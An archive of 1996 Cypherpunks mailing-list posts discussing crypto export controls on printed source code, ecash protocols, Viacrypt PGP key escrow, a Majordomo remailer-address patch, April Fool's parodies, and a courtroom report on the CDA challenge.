My guess is that exporting in machine readable form on paper, such as by
a bar code, would also be equivalent.  There is a little more effort
involved in scanning it in, but if the bar code has good redundancy and
is reliable, it is not much more.

The next step is printed source code.  There are fonts (or other tricks,
such as per-line checksums) which can be used to make scanning this in
relatively reliable.  I don't have enough experience to know how good it
can get.  But let's suppose it were practically error-free.

By the reasoning above, this would also be restricted.  OCR'ing the text,
if it can really be done mechanically and automatically (which is clearly
not the case with the technology that Phil Karn had access to) is not
much different from getting it on a floppy.

Yet we know that at least in the case of Applied Cryptography the book,
export permission was granted.  So at least in some cases, printed
source code can be exported.  I understand that the PGP source code
book is in an OCR friendly font.  It would be interesting to hear
whether Phil's experience above is actually made easier with the PGP
source code book.

I think the bottom line is that the government will restrict any method
which makes it significantly easier for a foreigner to get working
source code than by typing it in from a book by hand.  (BTW, Phil's
lawyer did have two secretaries do that.  It took under 3 hours,
although presumably the code was subject to some of two same printing
errors that Phil had to fix in his test.) So my guess is that
technically you could get in trouble by doing what you propose.

I'm not a lawyer though -

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 3 Apr 1996 20:50:27 +0800
To: cypherpunks@toad.com
Subject: Re: (fwd) Russians Break RSA?
Message-ID: <ad8709ed05021004bd30@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:52 PM 4/2/96, Chris Stillson wrote:
>at Kryptogorodok, the secret city of Soviet cryptographers
>>hidden in the Urals (and first visited by an outsider, Stephen
>>Wolfram, only a couple of years ago).
>>
>
>
>Nice touch. I worked at Wolfram Research a few years ago, and wolfram
>actually was in Russia for a tour.
>

And based on an actual happening. Wolfram reasoned that the Soviets must've
had a "secret city of cryptographers," as they had secret cities for
several other kinds of military scientists (rockets, atomic energy, CBW,
metallurgy, etc.). He speculated that the U.S. should locate this city and
see if the residents needed jobs.

And of course several people have speculated that if the "P ?=? NP" ball of
wax has been solved by anyone, in secret, the Russians are a good bet,
given their strong skills in pure mathematics. (And my choice of Kolmogorov
was not just a name made up...)

I first floated this April Fool's Day joke two years ago...I figured enough
time had passed and enough newcomers had subscribed to make it worth
posting again. Wolfram actually saw the copy two years ago and liked it.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 3 Apr 1996 16:46:05 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
Message-ID: <v02120d0bad8775c7800c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 AM 4/2/96, Hal <hfinney@shell.portal.com> wrote:


> I am curious to know why you say that ecash is not a currency.  One of
> the main points of my original posting was to challenge this view.

I'd like a shot at this...

I sort of blurted this at the coin-BOF at CFP96, and I think I'll still own
up to it, viz,

When money finally goes onto the net, and never comes back, the digital
bearer certificates we call ecash will be a currency. Until then, it's just
a script.

Or is it an interestless bond? ;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 3 Apr 1996 21:55:44 +0800
To: cypherpunks@toad.com
Subject: Please stop sending "Test" messages to the list
Message-ID: <ad87249e0602100402a4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:35 PM 4/2/96, Anonymous wrote:
>Test of remailer at utopia.hacktie.nl

Look, folks, we're seeing more and more of these "test" messages. With
1000+ subscribers, clearly people should not be using the list as a target
for test messages.

And there is no need. Unlike, say, mail-to-newsgroup systems, about which
there may be some doubt as to functioning, the Cypherpunks list is just
another mailing address. Thus, if you can send anonymous mail to
yourself--always a good test target--then you can send it to the
cypherpunks@toad.com!

I just deleted-and-ignored the last several of these "test" messages, but
the time has come to say "Enough."

(This is, naturally, not an enforceable opinion. I appeal to your common
sense to not use the list as a target for test messages.)

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Wed, 3 Apr 1996 17:21:50 +0800
To: cypherpunks@toad.com
Subject: [MagicMoney] Passwords of various PGP keys.
Message-ID: <9604030141.AB20176@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


I played with Magic Money recently.  I wondered:

Where are the passwords of the various PGP keys stored?

Now, suppose you want to use this system for serious use:

What, if any, are the critical files that must be protected
from outsiders to prevent tempering (altering without the owner's ability to
quickly discover the manipulation) with the system data?

Is is necessary to encrypt the whole client directory when you
don't use it?

Ditto, for the server?

JFA

 PGP key at:               http://w3.citenet.net/users/jf_avon
 Jean-Francois Avon <jf_avon@citenet.net> ID:C58ADD0D 96/03/01    
 fingerprint: 52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 

 Unsollicited commercial e-mail will be proofread at a rate of 
 165 $ U.S. per hours.   Any sender of unsollicited commercial 
 e-mail will be considered as to have accepted the above ment-
 ionned terms.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 3 Apr 1996 14:45:43 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199604021835.UAA05687@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Test of remailer at utopia.hacktie.nl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: walter@cithe302.cithep.caltech.edu (Chris Walter)
Date: Wed, 3 Apr 1996 20:11:25 +0800
To: mlist-cypherpunks@nntp-server.caltech.edu
Subject: Article on PGP Viacrypt
Message-ID: <WALTER.96Apr2124421@cithe302.cithep.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi Folks,

There is an interesting article by Simon Garfinkle in this
morning's(Apr 2nd) electronic version of the San Jose Mercury news.
Its on the index page so I don't think you need an account to read
it.

The article deals with the new key management features and extensions
in Viacrypt and how PRZ is upset since it allows employers to read
their employees messages.

The URL is:

http://www.sjmercury.com/business/priv401.htm

-Chris
walter@cithe501.cithep.caltech.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Wed, 3 Apr 1996 19:28:02 +0800
To: walter@cithe302.cithep.caltech.edu (Chris Walter)
Subject: Re: Article on PGP Viacrypt
In-Reply-To: <WALTER.96Apr2124421@cithe302.cithep.caltech.edu>
Message-ID: <199604030451.UAA06038@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Chris Walter writes:
> 
> Hi Folks,
> 
> There is an interesting article by Simon Garfinkle in this
> morning's(Apr 2nd) electronic version of the San Jose Mercury news.
> Its on the index page so I don't think you need an account to read
> it.
> 
> The article deals with the new key management features and extensions
> in Viacrypt and how PRZ is upset since it allows employers to read
> their employees messages.

I read it this morning.
The gist is that this new evil PGP lets your employer
SPY ON EVERYTHING YOU DO!  And was written in about
that tone.

I was disappointed by the article.  I don't know if Simson
is deluded about the use of Viacrypt PGP, or the article got
hacked up by by ignorant/malicious editors, or my understanding of
Viacrypt PGP is competely wrong.

I thought the purpose to putting key escrow (that's real escrow
not GAK) into PGP was to allow its use for business purposes.
Often in business use you're not too concerned with keeping secrets from
your employer or fellow employees, but do want to keep those
secrets within the company.  And there is a real concern that you
might encrypt company-secret stuff and then fall off your motorcycle
and get run over by a truck, leaving your securely-encrypted company
secrets suddenly inaccessable to the company...
Key escrow, with the keys held by the company, is designed to prevent
this problem.

The article failed to mention that you're not prevented from using
a non-escrow PGP for personal secrets (could Viacrypt PGP prevent
you from using PGP 2.6.2?  I don't think so) and made it sound
like Viacrypt PGP is designed to allow nosy employers to spy on
employees encrypted email.  I guess it would, if the employers were
that nosy and the employees dumb enough to use company-provided
escrowed PGP to send personal secrets.  But that theory's about
as credible as the Clipper chip proponents's "dumb crooks" theory
where crooks would want encrypted phones but be dumb enough to
forget that the Government held the keys...

Simson's the one main-line journalist who writes about internet
and computer issues that I still think has a clue, and has written
a pretty good book about PGP, so I'd be suprised if he got this
so wrong.  On the other hand, I haven't used this new Viacrypt PGP 
and I'm going on what I think that escrowed PGP is really good for.
Maybe my feeling about that have blinded me to reality.  Or, most
likely, the editor(s) hacked the story up either out of ignorance
or to present a viewpoint that they had already decided they want to
present, truth be damned.


If I wanted to present a conspiracy theory about the government
wanting to discourage use of PGP for businesses, this would be the
place to do it.  If PGP gains a foothold in the businessplace
it'll be nearly impossible to eradicate, given the fact that
(big) business essentially runs the country.  Key escrow will
make PGP a lot more usefull to businesses, increasing its use.
I'm sure you can fill in the rest of the theory.


> http://www.sjmercury.com/business/priv401.htm
> 


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 3 Apr 1996 18:13:19 +0800
To: "Brian B. Riley" <brianbr@together.net>
Subject: Re: Why Americans feel no compulsion ...
In-Reply-To: <315F53DC.4685@together.net>
Message-ID: <Pine.BSF.3.91.960402213933.24107B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


Yeah, and some americans speak C, and FORTRAN, and FORTH, and ...

----------------------------------------
Rabid Wombat
wombat@mcfeely.bsfs.org
----------------------------------------
> > At 12:21 AM 3/28/96, Syed Yusuf wrote:
> > >If a person who speaks three languages is tri-lingual
> > >If a person who speaks two languages is bi-lingual
> > >
> > >What do you call a person who only speaks one language?
> > >
> > >An American.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: survey@pathfinder.com
Date: Wed, 3 Apr 1996 18:16:29 +0800
To: cypherpunks@toad.com
Subject: Pathfinder Survey
Message-ID: <199604030254.VAA24829@tigger.dev.pathfinder.com.pathfinder.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Pathfinder Member:

Will you help us on a very important project? You are one of a
representative group of Pathfinder members that we are asking to 
take part in a special survey.  The answers you provide us with 
will help us make Pathfinder a pleasurable experience for its users.

Our survey is available online (you can cut and paste the URL into your
browser) at: 

http://pathfinder.com/poll

Please take a few minutes and complete the questionnaire now.  Your
answers will be treated in the strictest confidence.  Since you are 
part of a small, carefully selected sample, your response is very 
important to the success of our study.

Thank you very much for your help.

Sincerely yours,

Gina Monaco
Market Research Manager
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 3 Apr 1996 19:49:26 +0800
To: daw@cs.berkeley.edu
Subject: Re: Chaumian ecash without RSA
Message-ID: <199604030633.WAA06128@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain



>> 2:  Nobody except the bank can verify that a coin has face validity.

At 04:55 PM 4/2/96 +0100, D.A. Wagner wrote:
> I claim that statement 2 is also true of Digicash's protocol as well.
>
> Recall that Digicash is using an *online clearing* protocol-- so you
> can't tell whether a coin is valid without consulting the bank.
> Consulting the bank is absolutely necessary to prevent double spending.

Suppose Alice generates an unsigned coin, blinds it, and shows Bob the
usigned, blinded coin.

Bob then has the bank sign it, and gives the signature to Alice.  

If we use RSA to sign the coin, Alice now knows she has a valid 
coin, because she can verify the coin herself without needing to
show it to the bank.  So Bob has paid Alice some money, and 
nobody can double spend the coin, because Alice, and only Alice, 
knows the blinding factor.

So Alice does *not* need to check with the bank.

Alice cannot do this with your protocol, so we cannot have payee 
anonymity with your protocol.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 3 Apr 1996 19:50:58 +0800
To: cypherpunks@toad.com
Subject: Re: software with "hooks" for crypto
Message-ID: <199604030639.WAA06486@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:31 PM 4/2/96 -0800, Michael Elkins wrote:
>Hello all,
>
>I'm trying to figure out exactly what the laws are regarding the export of
>software which contains "hooks" for PGP.  In various forms, I've heard
>that it's not the ITAR which prevents this, but more a "suggestion" by
>the NSA that we "shouldn't do it."  Does anyone have any pointers to
>real legislation/laws regarding this?

Evidently you are under the impression that we are still governed
in accordance with the rule of law.

Since the legislation in question was intended to prohibit gun running,
it naturally contains no such thing.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 3 Apr 1996 20:43:23 +0800
To: sales@elementrix.co.il
Subject: Re: Elementrix Technology Announces Power Quantum Cryptography
Message-ID: <199604030716.XAA14560@dfw-ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:58 AM 4/1/96 -0800, sales@elementrix.co.il wrote:
>By using a novel method (covered by trade secret law and now patent-pending
>in 26 countries) our server software transmits packets onto your local
>network without reading them, thus preserving their unique quantum
>properties.  Any attempt to read the packet, except by the intended
>recipient will destroy the quantum waveform of the packet.  Our
>sophisticated error-recovery system will detect this and re-initialize
>with a predefined Emergency Quantum State, which has all the same
>characteristics as the Normal Quantum State, but has not been compromised
>by the attempted eavesdropper.

Unfortunately, the method can be cracked easily.  Because the system
uses two patented states, a Normal Quantum State and an Emergency Quantum State,
and it's patent-pending in 26 different countries, you can divide the
26 patent-pending states by the two patented states giving a pending 13.
By rotating the 13 twice, of course, the original text can be recovered.

However, the method is partially useful, using a lemma by Dr. Denning.
While 26 is divisible by 2, it's not divisible by 3, so the addition of
a third state renders it effective again.  Denning's paper recommends
use of a National Security State as the additional state, which provides
effective protection, additional security and supports the legitimate needs
of law enforcement.  So if you want your crypto to be secure, it's an offer 
you can't refuse...

Another approach has been suggested by the Syndicate for Quantum Deconstruction,
in their prescient 1998 paper "Smash the State".  By deconstructing the 
quantum packet on arrival, an imbalance is created which can only be resolved
by constructing the packet an equal time period before the origination
of the packet in the Normal Quantum State.  In addition to preventing the
emergence of the Emergency Quantum State, it allows, and in fact requires,
the packet to be present and read some time before its original transmission
time.
Copies of the paper are currently circulating only as preprints; the
original will be posted on
http://www.timenet.net/1998/Physics/~SQuD/Deconstruct.vrml
as soon as it becomes available.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281

1995: Chat rooms, espresso, and Linux
1996: Exon, melatonin, and Java.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 3 Apr 1996 18:54:05 +0800
To: cypherpunks@toad.com
Subject: Majordomo and anon.penet.fi
Message-ID: <Pine.LNX.3.92.960402234359.2599A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


In case anyone is interested, I have written a patch for Majordomo 1.93 that
will automatically convert an address of the form "anXXXXX@anon.penet.fi" to
"naXXXXX@anon.penet.fi".  I have tested the code I used to patch up Majordomo,
but I haven't verified that it actually works within Majordomo.

*** majordomo.pl.orig	Sat Jan  7 12:34:27 1995
--- majordomo.pl	Tue Apr  2 23:24:15 1996
***************
*** 81,86 ****
--- 81,91 ----
      $ReplyTo = $array{'apparently-from'} unless $ReplyTo;

      join(", ", &main'ParseAddrs($ReplyTo)) if $ReplyTo;
+     if ($ReplyTo =~ '^(an).*\@anon\.penet\.fi')
+     {
+      $anonid = substr($ReplyTo, 2);
+      $ReplyTo = "na$anonid";
+     }
      $ReplyTo;
  }

-- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 3 Apr 1996 20:50:04 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Why Americans feel no compulsion ...
Message-ID: <199604030815.AAA01084@dfw-ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:41 PM 4/2/96 -0500, Rabid Wombat wrote:
>Yeah, and some americans speak C, and FORTRAN, and FORTH, and ...

This discussion is about languages for communications 
between _humans_ - like ALGOL, and the lambda calculus  :-)
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281

1995: Chat rooms, espresso, and Linux
1996: Exon, melatonin, and Java.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 3 Apr 1996 20:59:52 +0800
To: cypherpunks@toad.com
Subject: Disclosure of Public Knowledge to Foreigners
Message-ID: <ad876a7a090210046c48@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Here's a conclusion I reach at the end of this piece:

"There is a reasonable chance the Supreme Court would see the overall
absurdity of a situation where the knowledge is freely available to 200
million adult Americans, with no restrictions whatsover on publication,
discussion, etc., and yet uttering this knowledge in front of a foreigner
is a crime."


At 1:47 AM 4/3/96, Hal wrote:

>The next step is printed source code.  There are fonts (or other tricks,
>such as per-line checksums) which can be used to make scanning this in
>relatively reliable.  I don't have enough experience to know how good it
>can get.  But let's suppose it were practically error-free.

Nearly error-free entry of credit card slips has been done for many years
in various offshore data entry locations (Barbados was once a major center
of this, with jets carrying in raw credit card slips to be processed by the
Barbadans, who were highly literate and well-trained in English, and yet
who worked cheap).

Interestingly, according to a friend of mine (Mike Ward, of San Jose), it
is much cheaper (or was when he did the analysis a couple of years ago) to
have a chunk of text entered two or more times by humans and then XORed for
errors than to OCR the text. This form of error correction--redundant
entry--would presumably work well for Schneier's code, for example.

What Phil Karn and others are doing is a useful and interesting experiment,
and I join others in thanking Phil and the others. However, I think it
pushes the envelope without really touching the real issues.

To wit, here is my bold submission: Despite the ease with which printed
text can be entered by cheap labor in nearly any country, I'll bet a lot
that not a single person or foreign government got their crypto for actual
use from a book!

It just never was a credible claim that books like "Applied Cryptography"
could represent a "leakage" of valuable crypto knowledge. (In terms of
actual code--the book itself, like other books, is itself an incredibly
"damaging" book for evil enemies to use to educate their cryptographers,
but such is the case with nearly all technical books.)

The MIT Press book of PGP's code is closer to being an important example,
as approval of it for export could lead to offshore versions which are
"identical" to PGP and thus eport of PGP would have been de facto approved.
I submit that the issue has nothing to do with the OCR font used, modulo
the points made above about a determined effort to input the text.

In terms of realpolitik, a handwritten edition of the PGP code might be
ignored, where an OCR version is deemed "close enough" to being actual
runnable code that its export will not be approved. A distinction without a
difference in my book.

What we are really about to run into is the "export of knowledge" issue,
which I think the Constitution will have some pretty important things to
say about. (It has long been the case that certain armaments knowledge, and
atomic secrets as per the Atomic Energy Act, were restricted. But this
knowledge was _also_ not in the public domain. There have not been many
cases that I know of where knowledge was freely discussable within, say,
the United States, by any citizens (and maybe others, such as permanent
residents, foreign students at colleges, etc.) and yet this knowledge could
not be "exported" outside the U.S.

Except with our crypto laws, and some related Munitions Act laws.

There is a reasonable chance the Supreme Court would see the overall
absurdity of a situation where the knowledge is freely available to 200
million adult Americans, with no restrictions whatsover on publication,
discussion, etc., and yet uttering this knowledge in front of a foreigner
is a crime.

I don't think this would pass Constitutional muster, as the lawyers like to say.

(The British at least have an Official Secrets Act. Much as I dislike that
Act, at least they are more consistent in the sense of classifying things
as being secret. How can the U.S. argue that knowledge available in any
large library or bookstore to anyone who wants it, citizen or not, may not
be "disclosed" to foreigners? If it's common knowledge, it's common
knowledge!)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Wed, 3 Apr 1996 17:40:07 +0800
To: cypherpunks@toad.com
Subject: Treasure of Sierra Madres?
Message-ID: <199604030045.BAA17195@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


"The scent of riches wafting from cyberspace is overpowering."

Free CSI Report Explores Threats to Secure Electronic Commerce

San Francisco, April 2 -- The drive toward Internet commerce
is unstoppable.  But how serious are the security threats
associated with it?  And how effective are the proposed
solutions? Computer Security Iinstitute's "Special Report on
Electronic Commerce Security: Treasure of Sierra Madres?"
offers a comprehensive look at the risks, threats and
vulnerabilities of Internet-based transactions.

Will the profits justify the risk?  What lessons can be drawn
from recent revelations such as the vetting of Netscape, the
robbing of Citibank, the ransacking of the Netcom and the
Kocher "timing attack?" This latest "CSI Special Report"
contains insightful answers from a broad range of experts
including Dr. Gene Spafford of Computers, Operations, Audit,
Security and Technology (COAST), Donn B. Parker of SRI
International, Dan Farmer, co-author of SATAN, and Mack Hicks,
Vice President of Bank of America.

"The scent of riches wafting from cyberspace is overpowering,"
comments Richard Power, CSI editor and author of the report. 
"The risk of failing to go on-line is perceived as greater
than the risk of failing to go on-line securely.  But recent
revelations about vulnerabilities in Java and Netscape
highlight how much still needs to be done."

The 19-page study includes practical tools such as electronic
commerce security checklists and sample electronic commerce
policies. To obtain a free copy of CSI's "Special Report on
Electronic Commerce Security" email your mailing address to
prapalus@mfi.com, phone 415-905-2310, or fax 415-905-2218.

Computer Security Institute (CSI) is the industry's leading
international membership organization specifically serving the
information security professional. Established in 1974, CSI
has members worldwide and provides a wide variety of
information and educational programs to assist practitioners
in protecting the information assets of corporations and
governmental organizations.

--








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 4 Apr 1996 00:57:16 +0800
To: cypherpunks@toad.com
Subject: CDA Court Challenge: Update #3
Message-ID: <Pine.SUN.3.91.960402181211.24105C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain





-----------------------------------------------------------------------------
                           The CDA Challenge, Update #3
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

April 1, 1996


PHILADELPHIA -- Chief Judge Dolores Sloviter's mouth fell open in
astonishment this afternoon when net.culture guru Howard Rheingold
testified that some online communities elect cyberjudges to hear
disputes. Sloviter asked if realspace judges "can escape to this 
community?" Judge Stewart Dalzell wondered: "How are they selected?
Is there impeachment?" 

The court's questions of Rheingold -- who appeared in a glowing blue
suit, an iridescent pink shirt, and the first tie he's worn in a
decade -- showed that the judges hearing our challenge to the CDA are
trying hard to understand the Net. But while the three-judge panel was
fascinated by Rheingold, they just didn't connect with him.

This was due largely to the skilled lawyering of the Department of
Justice's Patricia Russotto -- the Marcia Clark of this case. During
her cross-examination, Russotto repeatedly steered Rheingold away from
describing relatively understandable online communities like the WELL
-- and towards hangouts like MUDs and MOOs that he said are inhabited
by "dwarves, wizards, and princesses." Belittling those online
communities, Russotto repeatedly dismissed them as "these fantasy
worlds" and tried to confuse the judges by tossing a string of
acronyms at them, staccato.

Judge Dalzell rose to the challenge: "All right, I'll take the bait.
What's a MUD?"

Like Dalzell, Judge Sloviter is enjoying this case. As the chief judge
of the U.S. Third Circuit Court of Appeals, she usually deals with
lawyers, not expert witnesses, and clearly likes to quiz them herself.
Responding to Rheingold's description of MUDs, she said: "I don't know
about being a wizard, but I'd be a princess."

Eventually the line of questioning turned to BBSs, and Russotto tried
once again to damage Rheingold's credibility, saying he had stated
under oath that BBSs were "open to everyone" but had just testified
that adult BBSs were not. He clarified, and rallied when asked if he
let his 11-year old daughter surf the Net unsupervised: "I teach her
that just as there are nutritious things to put in your body, there
are nutritious things to put in your mind."

Russotto continued, rapidfire:
  "Do you really think that Hamlet depicts sexual or excretory acts in a
   patently offensive manner?"
  "You have not participated in virtual communities built around
   trading sexually-explicit images, correct?"
  "You are aware that sexually-explicit networks can form around a BBS?"
  "Virtual communities can form around such a BBS?"
  "Some Usenet newsgroups carry sexually-explicit materials?"
  "An ISP can decide to carry certain newsgroups?"
  "The particular server you're on could decide to carry the alt.sex
   and alt.binaries hierarchy?"

The tension had heightened earlier in the day, just before lunch, when
Russotto tried to prevent Rheingold from testifying. When we
introduced the celebrated author of "Virtual Communities" as our
witness, Russotto objected: "We would submit that his expert opinion
is not relevant to this case." Battering Rheingold with a quick series
of questions, the DoJer forced Rheingold to stumble. ACLU attorney
Chris Hansen quickly rescued his witness and Sloviter overruled
Russotto's objection: "The court will hear Mr. Rheingold."

Over lunch in the courthouse cafeteria, I talked with Rheingold, who
was understandably nervous from the drumming he had experienced
minutes earlier. Of course, the very fact that we were chatting like
old friends demonstrated the power of a virtual community -- we had
communicated in one form or another every day for the last year, but
we had never met in person before.

Like the man himself, Rheingold's testimony was interesting and
colorful, unlike that of Bill Burrington, the director of public
policy for America Online, who was the first witness of the day. A
good number of courtroom observers, including myself and some
reporters, snoozed through most of Burrington's statements.

I was more-or-less awake enough to realize that Burrington was once
again characterizing AOL as a "resort pool with lifeguards" next to
the wild, untamed ocean of the Internet, with its predators and
sharks: "There is a channel to the Internet. You can be whisked out
into the sea." His evils-of-the-Net description confused Judge
Sloviter, who asked: "When you say whisked out into the sea, you don't
mean involuntarily whisked?"

Tony Coppolino from the DoJ cross-examined Burrington. Coppolino seems
to be the most cyber-savvy DoJer and the leader of their legal team on
this case. Like Russotto, he doesn't pass up an opportunity to damage
the credibility of our witnesses:
  Judge Sloviter: "How many newsgroups are available on AOL?"
  Burrington: "Up to 20,000."
  Judge Dalzell: "I thought someone said 30,000."
  Coppolino: "I have a stipulation here saying 15,000."

Pressed by Coppolino, Burrington admitted that AOL didn't carry
Playboy or Penthouse because the material was "inappropriate for
families and children." Later Coppolino suggested that AOL has
problems with pedophiles and child pornographers, asking Burrington to
describe a case where an AOLer found children's names from a chat room
then sent them sexually-explicit images. Burrington parried: "This is
the first such incident. We terminated his account immediately and are
cooperating with Federal law enforcement."

When HotWired honcho Andrew Anker took the stand, the questioning
turned to alt.sex.bondage. Judge Sloviter started by asking: "What is
alt.sex.bondage? What does that mean?"

Turns out that HotWired had published a story about the newsgroup,
though by the end of the questioning, the judges seemed convinced that
HotWired was a net.porn haven and were surprised when Anker estimated
that much less than 10 percent of his web site's content was
sexually-explicit. Again, Judge Dalzell tossed us a few sympathetic
questions: "If you were to label your web site as adult, would it
scare off advertisers?"

After some brief testimony by ACLU plaintiff Stephen Donaldson of Stop
Prisoner Rape, Barry Steinhardt took the stand. Steinhardt is the
associate director of the ACLU -- I first got to know him when he
blasted CMU for censoring its USENET feed years ago -- and was subject
to an antagonistic cross-examination from Craig Blackwell. Blackwell
relied on his boss Tony Coppolino for technical tips, and stumbled a
few times, like when he confused AOL with a web site on the Internet:
  Blackwell:  "The ACLU has two Internet sites, right?"
  Steinhardt: "No. We have one Internet site and we are a content
               provider on America Online."

During the DoJ's questioning of Steinhardt, a few points emerged:
  * The content the ACLU posts to the web and AOL is educational.
  * The ACLU controls content on its web site but not in AOL chat
    rooms and discussion groups.
  * The ACLU is concerned that the CDA subjects it to liability for
    "indecent" material, including George Carlin's monologues it has
    placed online.
  * The DoJ is trying to draw a distinction between "indecent" images
    of couples engaged in sexual intercourse and educational
    "indecent" material that they will claim is not going to be
    prosecuted under the CDA.

We're still wondering who the DoJ will call as their pro-CDA
witnesses. The two prime suspects are someone supposedly from the
Department of Defense and a computer scientist from Carnegie Mellon
University.

I suspect that the DoD guy is the gent who's been sharing the second
row of courtroom seats with me -- a grey-haired gentleman always
sporting a nondescript grey flannel suit. He's been sitting on the DoJ
side of the courtroom (the ACLU is on the left, of course), and after
court adjourned he was confabbing with them about plans to meet later
in the day.

I walked over and asked Grey Flannel Suit if he was with the DoJ, and
he replied: "I just do some computer work for them." I was asking Grey
Flannel for his name when DoJ attorney Jason Baron jumped between us:
  Baron:     "He can't talk to you."
  McCullagh: "Why don't you let him make that decision for himself?"
  Baron:     "I make decisions for him."
  McCullagh: "What's his name?"
  Baron:     "He has no comment."

